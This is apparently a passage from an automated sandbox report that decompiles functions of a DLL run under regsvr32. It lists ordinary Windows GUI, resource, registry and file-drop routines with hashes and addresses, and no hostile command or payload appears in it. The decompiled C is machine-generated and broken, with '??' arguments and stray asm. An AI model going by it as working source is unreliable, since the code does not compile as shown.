                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageRectSend
                                                                              • String ID:
                                                                              • API String ID: 3783401013-0
                                                                              • Opcode ID: fc1ecc51cc2e9483f734604cbea715ed00f6df56b066d74e5ffdc4dd8b50a49c
                                                                              • Instruction ID: ec3185a284b11547def49f764e42931973184c2f244cae81ba90b43179a7a37d
                                                                              • Opcode Fuzzy Hash: fc1ecc51cc2e9483f734604cbea715ed00f6df56b066d74e5ffdc4dd8b50a49c
                                                                              • Instruction Fuzzy Hash: 0A116DB67097808BDA51DF12A80079AB7A0FB89FD4F1A4129EE890B754DF3CE4D5CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100142DC Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 31%
                                                                              			E100142DC(void* __esi, void* __ebp, intOrPtr* __rcx, void* __r8, void* __r9, void* __r10, void* __r11) {
				intOrPtr _v32;
				intOrPtr _v40;
				struct HWND__* _t18;
				void* _t28;
				void* _t29;
				intOrPtr _t34;
				intOrPtr* _t35;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t49;

				_t49 = __r11;
				_t48 = __r10;
				_t47 = __r9;
				_t46 = __r8;
				_t29 = __ebp;
				_t28 = __esi;
				_t34 =  *__rcx;
				_t35 = __rcx;
				if( *((intOrPtr*)(_t34 + 0x240))() != 0) {
					_t34 =  *__rcx;
					 *((intOrPtr*)(_t34 + 0x2e0))();
				}
				r9d = 0;
				r8d = 0;
				_t4 = _t47 + 0x1f; // 0x1f
				_t27 = _t4;
				SendMessageW(??, ??, ??, ??);
				r9d = 0;
				r8d = 0;
				_v32 = 1;
				_v40 = 1;
				E100126C8(_t4, _t29, _t34, _t45, _t46, _t47, _t48);
				E10013600(_t28, _t34, _t35, _t45, _t49);
				if(_t34 == 0) {
					E10016544();
					asm("int3");
				}
				r9d = 0;
				r8d = 0;
				SendMessageW(??, ??, ??, ??);
				r9d = 0;
				r8d = 0;
				_v32 = 1;
				_v40 = 1;
				E100126C8(_t27, _t29, _t34, _t45, _t46, _t47, _t48);
				_t18 = GetCapture();
				if(_t34 != 0) {
					r9d = 0;
					r8d = 0;
					return SendMessageW(??, ??, ??, ??);
				}
				return _t18;
			}















                                                                              0x100142dc
                                                                              0x100142dc
                                                                              0x100142dc
                                                                              0x100142dc
                                                                              0x100142dc
                                                                              0x100142dc
                                                                              0x100142e3
                                                                              0x100142e6
                                                                              0x100142f1
                                                                              0x100142f3
                                                                              0x100142f9
                                                                              0x100142f9
                                                                              0x10014303
                                                                              0x10014306
                                                                              0x10014309
                                                                              0x10014309
                                                                              0x1001430f
                                                                              0x10014319
                                                                              0x1001431c
                                                                              0x10014321
                                                                              0x10014329
                                                                              0x10014331
                                                                              0x10014339
                                                                              0x10014344
                                                                              0x10014346
                                                                              0x1001434b
                                                                              0x1001434b
                                                                              0x10014350
                                                                              0x10014353
                                                                              0x10014358
                                                                              0x10014362
                                                                              0x10014365
                                                                              0x1001436a
                                                                              0x10014372
                                                                              0x1001437a
                                                                              0x1001437f
                                                                              0x10014388
                                                                              0x1001438a
                                                                              0x1001438d
                                                                              0x00000000
                                                                              0x10014395
                                                                              0x100143a1

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Capture
                                                                              • String ID:
                                                                              • API String ID: 1665607226-0
                                                                              • Opcode ID: 931feeaa500397886dfc7be7e8d4b6f6eb8c890005268208612621a5613af146
                                                                              • Instruction ID: 09d74bdabb0694eac68629189311ad627a563e7a116a6acc739b4c0e7cc159a5
                                                                              • Opcode Fuzzy Hash: 931feeaa500397886dfc7be7e8d4b6f6eb8c890005268208612621a5613af146
                                                                              • Instruction Fuzzy Hash: 0011913670064083EB209F75E8A5B9E7BA1EBCDB8CF565010DE490BB24DF79D0D58B00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10027DEC Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 41%
                                                                              			E10027DEC(void* __ebx, void* __ecx, void* __edx, signed int* __rax, void* __rcx, void* __rdx) {
				signed int _t17;
				void* _t23;
				signed int _t25;
				signed int _t27;
				void* _t28;
				signed int* _t38;
				signed int* _t48;
				void* _t49;
				signed int* _t50;
				void* _t51;
				void* _t52;
				void* _t53;

				_t38 = __rax;
				_t48 =  *((intOrPtr*)(__rcx + 0xc0));
				_t50 =  *((intOrPtr*)(__rcx + 0xb8));
				_t49 = __rcx;
				if( *((long long*)(__rcx + 0xb0)) != 0) {
					E1000A57C(__ebx, __ecx, __edx, _t28, __rax, _t51, _t52, _t53);
					r8d = 5;
					FindResourceW(??, ??, ??);
					LoadResource(??, ??);
					_t50 = __rax;
				}
				if(_t50 != 0) {
					LockResource();
					_t48 = _t38;
				}
				_t23 = 1;
				if(_t48 != 0) {
					_t25 =  *_t48;
					if(_t48[0] != 0xffff) {
						_t27 = _t48[2];
						_t17 = _t48[3];
					} else {
						_t25 = _t48[3];
						_t27 = _t48[4] & 0x0000ffff;
						_t17 = _t48[5] & 0x0000ffff;
					}
					if((_t25 & 0x00001801) != 0 || _t27 != 0 || _t17 != 0) {
						_t23 = 0;
					}
				}
				if( *((long long*)(_t49 + 0xb0)) != 0) {
					FreeResource();
				}
				return _t23;
			}















                                                                              0x10027dec
                                                                              0x10027dfd
                                                                              0x10027e04
                                                                              0x10027e0b
                                                                              0x10027e0e
                                                                              0x10027e10
                                                                              0x10027e1c
                                                                              0x10027e29
                                                                              0x10027e35
                                                                              0x10027e3b
                                                                              0x10027e3b
                                                                              0x10027e41
                                                                              0x10027e46
                                                                              0x10027e4c
                                                                              0x10027e4c
                                                                              0x10027e52
                                                                              0x10027e57
                                                                              0x10027e5f
                                                                              0x10027e61
                                                                              0x10027e70
                                                                              0x10027e74
                                                                              0x10027e63
                                                                              0x10027e63
                                                                              0x10027e66
                                                                              0x10027e6a
                                                                              0x10027e6a
                                                                              0x10027e7e
                                                                              0x10027e8a
                                                                              0x10027e8a
                                                                              0x10027e7e
                                                                              0x10027e94
                                                                              0x10027e99
                                                                              0x10027e99
                                                                              0x10027ea9

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeLoadLock
                                                                              • String ID:
                                                                              • API String ID: 1078018258-0
                                                                              • Opcode ID: 3fbf07779a507d9f0d91d7a44247be541b66ac2cf10eef5eac3cba4614367305
                                                                              • Instruction ID: ec4ca254d394988c64dfcedae0838a69ee65c6d7568cbff5f865dad37dba27d2
                                                                              • Opcode Fuzzy Hash: 3fbf07779a507d9f0d91d7a44247be541b66ac2cf10eef5eac3cba4614367305
                                                                              • Instruction Fuzzy Hash: 1111CE2A70278086DA49EF12A9043A97361FB0DBD1F4A8070CF0A077A0EF28DCE5C721
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100321B4 Relevance: 6.1, APIs: 4, Instructions: 54registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegSetValueExW.ADVAPI32 ref: 10032214
                                                                              • RegCloseKey.ADVAPI32 ref: 1003221F
                                                                              • sprintf_s.LIBCMTD ref: 10032240
                                                                              • WritePrivateProfileStringW.KERNEL32 ref: 10032257
                                                                                • Part of subcall function 100320A4: RegCreateKeyExW.ADVAPI32 ref: 10032105
                                                                                • Part of subcall function 100320A4: RegCloseKey.ADVAPI32 ref: 1003210E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Close$CreatePrivateProfileStringValueWritesprintf_s
                                                                              • String ID:
                                                                              • API String ID: 1187789483-0
                                                                              • Opcode ID: 781ddfc599609163b5f810381315ffde2e4cac6f2ec46fdf22c69f69ab3fb5e5
                                                                              • Instruction ID: 53f7675ceee5c7da1fdcb2d6590270ea64de651ebd8aa2c87fc16473faad4d45
                                                                              • Opcode Fuzzy Hash: 781ddfc599609163b5f810381315ffde2e4cac6f2ec46fdf22c69f69ab3fb5e5
                                                                              • Instruction Fuzzy Hash: F31125363157849ADB42CBA1BD047DBA3A4E78DFD5F954022AE8A0BB54CE7CC081CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000AB20 Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 19%
                                                                              			E1000AB20(void* __ebx, void* __edx, void* __rax, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11) {
				void* _t14;
				int _t15;
				void* _t22;
				void* _t23;
				void* _t32;
				void* _t33;
				void* _t41;
				void* _t43;
				void* _t44;
				void* _t45;

				_t45 = __r11;
				_t44 = __r9;
				_t43 = __r8;
				_t41 = __rdx;
				_t32 = __rax;
				_t23 = __edx;
				_t22 = __ebx;
				_t33 = __rcx;
				if( *((intOrPtr*)(__rcx + 0x10)) == 0) {
					if( *((long long*)(__rcx + 0x20)) == 0) {
						E10016544();
						asm("int3");
					}
					if(_t23 == 0) {
						GetFocus();
						if(_t32 ==  *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x20)) + 0x40))) {
							GetParent();
							E10011808(_t22, _t23, _t32, _t32, _t41, _t43, _t44, _t45);
							r9d = 0;
							r8d = 0;
							SendMessageW(??, ??, ??, ??);
						}
					}
					_t15 = E100161B4( *((intOrPtr*)(_t33 + 0x20)));
					L11:
					 *((intOrPtr*)(_t33 + 0x28)) = 1;
					return _t15;
				}
				if( *((long long*)(__rcx + 0x18)) != 0) {
					return _t14;
				}
				if( *((intOrPtr*)(__rcx + 0xc)) >=  *((intOrPtr*)(__rcx + 0x30))) {
					E10016544();
					asm("int3");
				}
				asm("inc ebp");
				r8d =  !r8d;
				r8d = r8d & 0x00000003;
				asm("inc ecx");
				_t15 = EnableMenuItem(??, ??, ??);
				goto L11;
			}













                                                                              0x1000ab20
                                                                              0x1000ab20
                                                                              0x1000ab20
                                                                              0x1000ab20
                                                                              0x1000ab20
                                                                              0x1000ab20
                                                                              0x1000ab20
                                                                              0x1000ab28
                                                                              0x1000ab34
                                                                              0x1000ab71
                                                                              0x1000ab73
                                                                              0x1000ab78
                                                                              0x1000ab78
                                                                              0x1000ab7b
                                                                              0x1000ab81
                                                                              0x1000ab8b
                                                                              0x1000ab91
                                                                              0x1000ab9a
                                                                              0x1000ab9f
                                                                              0x1000aba2
                                                                              0x1000abad
                                                                              0x1000abad
                                                                              0x1000ab8b
                                                                              0x1000abb9
                                                                              0x1000abbe
                                                                              0x1000abbe
                                                                              0x00000000
                                                                              0x1000abbe
                                                                              0x1000ab3b
                                                                              0x1000abcc
                                                                              0x1000abcc
                                                                              0x1000ab47
                                                                              0x1000ab49
                                                                              0x1000ab4e
                                                                              0x1000ab4e
                                                                              0x1000ab55
                                                                              0x1000ab58
                                                                              0x1000ab5b
                                                                              0x1000ab5f
                                                                              0x1000ab64
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: EnableFocusItemMenuMessageParentSend
                                                                              • String ID:
                                                                              • API String ID: 2297321873-0
                                                                              • Opcode ID: b8647db156d169e340931e1a98007f176e3954774ed377a22e3423ce29e0e814
                                                                              • Instruction ID: f890ae2641be00d2edda06f965b119f61175d3014dd787e14829f5894d484c36
                                                                              • Opcode Fuzzy Hash: b8647db156d169e340931e1a98007f176e3954774ed377a22e3423ce29e0e814
                                                                              • Instruction Fuzzy Hash: 1011CE3AB2055083FB24CF21DC957AC3332FB89B99F224210CE490BA19DFB5C8C58B40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10011C6C Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 72%
                                                                              			E10011C6C(void* __edx, void* __rax, void* __rcx) {
				void* _t4;
				void* _t9;
				void* _t10;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t29;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t35;

				_t21 = __rax;
				_t11 = __edx;
				_t14 = r8d;
				_t16 = __edx;
				GetDlgItem(??, ??);
				_t22 = __rax;
				if(__rax == 0) {
					L6:
					GetTopWindow();
					while(1) {
						_t23 = _t21;
						if(_t21 == 0) {
							break;
						}
						r8d = _t14;
						_t4 = E10011C6C(_t16, _t21, _t23);
						if(_t21 == 0) {
							GetWindow();
							continue;
						}
						goto L11;
					}
					return 0;
				} else {
					GetTopWindow();
					if(__rax == 0) {
						L3:
						_t29 = _t22;
						if(_t14 == 0) {
							return E10011808(_t9, _t11, _t21, _t29, _t31, _t33, _t34, _t35);
						}
						_t4 = E10011844(_t9, _t10, _t15, _t21, _t29, _t31, _t35);
						if(_t21 == 0) {
							goto L6;
						}
					} else {
						r8d = _t14;
						_t11 = __edx;
						_t4 = E10011C6C(__edx, __rax, __rax);
						if(__rax == 0) {
							goto L3;
						}
					}
				}
				L11:
				return _t4;
			}

















                                                                              0x10011c6c
                                                                              0x10011c6c
                                                                              0x10011c75
                                                                              0x10011c78
                                                                              0x10011c7d
                                                                              0x10011c86
                                                                              0x10011c89
                                                                              0x10011cc3
                                                                              0x10011cc6
                                                                              0x10011cec
                                                                              0x10011cef
                                                                              0x10011cf2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10011cce
                                                                              0x10011cd6
                                                                              0x10011cde
                                                                              0x10011ce6
                                                                              0x00000000
                                                                              0x10011ce6
                                                                              0x00000000
                                                                              0x10011cde
                                                                              0x00000000
                                                                              0x10011c8b
                                                                              0x10011c8e
                                                                              0x10011c97
                                                                              0x10011cab
                                                                              0x10011cad
                                                                              0x10011cb0
                                                                              0x00000000
                                                                              0x10011cb2
                                                                              0x10011cb9
                                                                              0x10011cc1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10011c99
                                                                              0x10011c99
                                                                              0x10011c9c
                                                                              0x10011ca1
                                                                              0x10011ca9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10011ca9
                                                                              0x10011c97
                                                                              0x10011cfe
                                                                              0x10011cfe

                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 10011C7D
                                                                              • GetTopWindow.USER32 ref: 10011C8E
                                                                                • Part of subcall function 10011C6C: GetWindow.USER32 ref: 10011CE6
                                                                              • GetTopWindow.USER32 ref: 10011CC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item
                                                                              • String ID:
                                                                              • API String ID: 369458955-0
                                                                              • Opcode ID: 0e011583831e7f79ae04266b62733ececa2ae9829e3a272a45272c6ae69d7274
                                                                              • Instruction ID: ae2cae37e90792f33697f0d0caf3395522f58dacdeeb5a0f8d108effe3417a48
                                                                              • Opcode Fuzzy Hash: 0e011583831e7f79ae04266b62733ececa2ae9829e3a272a45272c6ae69d7274
                                                                              • Instruction Fuzzy Hash: 0C014F2578335241ED0EDB2668017D962D5DF89FD5F0A58389D0E4B711FE78D8C68684
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002FE28 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 61%
                                                                              			E1002FE28(void* __edx, void* __eflags, intOrPtr* __rax, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11, long long _a8, long long _a16) {
				long long _v40;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				intOrPtr _t18;
				intOrPtr* _t44;
				void* _t45;

				_t32 = __rax;
				_v40 = 0xfffffffe;
				_t45 = __rcx;
				E10009454(__eflags, __rax, __rcx);
				_a16 = _t32;
				if(_t32 == 0) {
					__eflags = 0;
				} else {
					E1002FDD4(__edx, _t32, __rdx, _t44, __r8, __r9, __r11);
					_t44 = _t32;
				}
				GetCurrentProcess();
				GetCurrentProcess();
				_v56 = 2;
				_v64 = 0;
				_v72 = 0;
				if(DuplicateHandle(??, ??, ??, ??, ??, ??, ??) == 0) {
					if(_t44 != 0) {
						_t32 =  *_t44;
						 *((intOrPtr*)( *_t44 + 8))();
					}
					E10031C5C(GetLastError(), _t32,  *((intOrPtr*)(_t45 + 0x18)),  *((intOrPtr*)(_t45 + 0x18)), _t44, _t45);
				}
				 *((long long*)(_t44 + 8)) = _a8;
				_t18 =  *((intOrPtr*)(_t45 + 0x10));
				 *((intOrPtr*)(_t44 + 0x10)) = _t18;
				return _t18;
			}













                                                                              0x1002fe28
                                                                              0x1002fe30
                                                                              0x1002fe39
                                                                              0x1002fe41
                                                                              0x1002fe46
                                                                              0x1002fe4e
                                                                              0x1002fe5d
                                                                              0x1002fe50
                                                                              0x1002fe53
                                                                              0x1002fe58
                                                                              0x1002fe58
                                                                              0x1002fe5f
                                                                              0x1002fe68
                                                                              0x1002fe71
                                                                              0x1002fe79
                                                                              0x1002fe81
                                                                              0x1002fe9d
                                                                              0x1002fea2
                                                                              0x1002fea4
                                                                              0x1002feaf
                                                                              0x1002feaf
                                                                              0x1002fec1
                                                                              0x1002fec1
                                                                              0x1002fecb
                                                                              0x1002fecf
                                                                              0x1002fed2
                                                                              0x1002fedf

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                              • String ID:
                                                                              • API String ID: 3907606552-0
                                                                              • Opcode ID: 2d53666eccfaca0a6e6451e2929e3f05645a7f14405e41990fccfb55352f759d
                                                                              • Instruction ID: 4f72829eca42f83cb7a1264eddc2583f411308ebe37ad96dab0c6be31335cd52
                                                                              • Opcode Fuzzy Hash: 2d53666eccfaca0a6e6451e2929e3f05645a7f14405e41990fccfb55352f759d
                                                                              • Instruction Fuzzy Hash: 73114C76305B4083EB11CB26F9443AA62A1F789BE4F154238DFAD47BA5DF78D4858B00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10029A2C Relevance: 6.0, APIs: 4, Instructions: 49stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 15%
                                                                              			E10029A2C(signed int __ecx, void* __rcx, void* __rdx, void* __r8, void* __r9) {
				signed int _v40;
				char _v550;
				short _v552;
				int _t7;
				signed int _t15;
				int _t17;
				signed long long _t24;
				void* _t35;
				signed long long _t40;
				void* _t41;

				_t41 = __r8;
				_t35 = __rdx;
				_t15 = __ecx;
				_t24 =  *0x1006f4c8; // 0x6f13091946cb
				_v40 = _t24 ^ _t40;
				if(__rcx == 0) {
					E10016544();
					asm("int3");
				}
				if(_t35 == 0) {
					E10016544();
					asm("int3");
				}
				_t7 = lstrlenW();
				r8d = 0x1fe;
				_v552 = 0;
				_t17 = _t7;
				E1003A240(_t7, _t15, 0,  &_v550, _t35, _t41);
				r8d = 0x100;
				if(_t17 > r8d || GetWindowTextW() != _t17 || lstrcmpW() != 0) {
					SetWindowTextW();
				}
				return E10038D20(_t15, _v40 ^ _t40);
			}













                                                                              0x10029a2c
                                                                              0x10029a2c
                                                                              0x10029a2c
                                                                              0x10029a37
                                                                              0x10029a41
                                                                              0x10029a52
                                                                              0x10029a54
                                                                              0x10029a59
                                                                              0x10029a59
                                                                              0x10029a5d
                                                                              0x10029a5f
                                                                              0x10029a64
                                                                              0x10029a64
                                                                              0x10029a68
                                                                              0x10029a75
                                                                              0x10029a7b
                                                                              0x10029a82
                                                                              0x10029a84
                                                                              0x10029a89
                                                                              0x10029a92
                                                                              0x10029abe
                                                                              0x10029abe
                                                                              0x10029ade

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow$lstrcmplstrlen
                                                                              • String ID:
                                                                              • API String ID: 330964273-0
                                                                              • Opcode ID: 75ed51226f5280629b0109b59536bdbcafc76a0cab84c82e828d59633d1b8722
                                                                              • Instruction ID: e9dcbd6c216aa6bb449b90c41f1234fb4604acd4ce4c3df76dbfaf5f282f522f
                                                                              • Opcode Fuzzy Hash: 75ed51226f5280629b0109b59536bdbcafc76a0cab84c82e828d59633d1b8722
                                                                              • Instruction Fuzzy Hash: 7C01F96570568041EF25D765FC683AA5392EF8DBC4F864420DD8D4BA58EF3CC5C5CB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002C968 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: OffsetRect
                                                                              • String ID:
                                                                              • API String ID: 177026234-0
                                                                              • Opcode ID: 18fbadacf344de7dccbcb93ca263c61ed29b5630a6983cb9df1c375bf13da2dc
                                                                              • Instruction ID: 9a2677604fe337f7e22e0fed6e3a2f7474f74cf841671697755b7560c9ca3c3a
                                                                              • Opcode Fuzzy Hash: 18fbadacf344de7dccbcb93ca263c61ed29b5630a6983cb9df1c375bf13da2dc
                                                                              • Instruction Fuzzy Hash: 3B01D6367018688BC711CF76AC413D9A795E78CFD8F449022DE4A83718DEB8C586CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001E2AC Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 52%
                                                                              			E1001E2AC(void* __ebx, void* __edx, void* __esi, void* __rcx, void* __rdx, void* __r8, void* __r11) {
				signed int _v56;
				void* _v584;
				void* _t16;
				signed int _t17;
				int _t22;
				signed long long _t26;
				signed long long _t27;
				intOrPtr* _t40;
				void* _t44;

				_t41 =  &_v584;
				_t26 =  *0x1006f4c8; // 0x6f13091946cb
				_t27 = _t26 ^  &_v584;
				_v56 = _t27;
				SetActiveWindow(??);
				E10011808(__ebx, __edx, _t27, _t27, __rdx, __r8, _t44, __r11);
				r9d = 0;
				r8d = 0;
				_t22 = DragQueryFileW(??, ??, ??, ??);
				E1000A57C(__ebx, _t17, 0xffffffff, __esi, _t27, __r8, _t44, __r11);
				_t16 = 0;
				_t40 =  *((intOrPtr*)(_t27 + 8));
				if(_t22 > 0) {
					do {
						r9d = 0x104;
						DragQueryFileW(??, ??, ??, ??);
						 *((intOrPtr*)( *_t40 + 0x110))();
						_t16 = _t16 + 1;
					} while (_t16 < _t22);
				}
				DragFinish();
				return E10038D20(_t17, _v56 ^ _t41);
			}












                                                                              0x1001e2b1
                                                                              0x1001e2b8
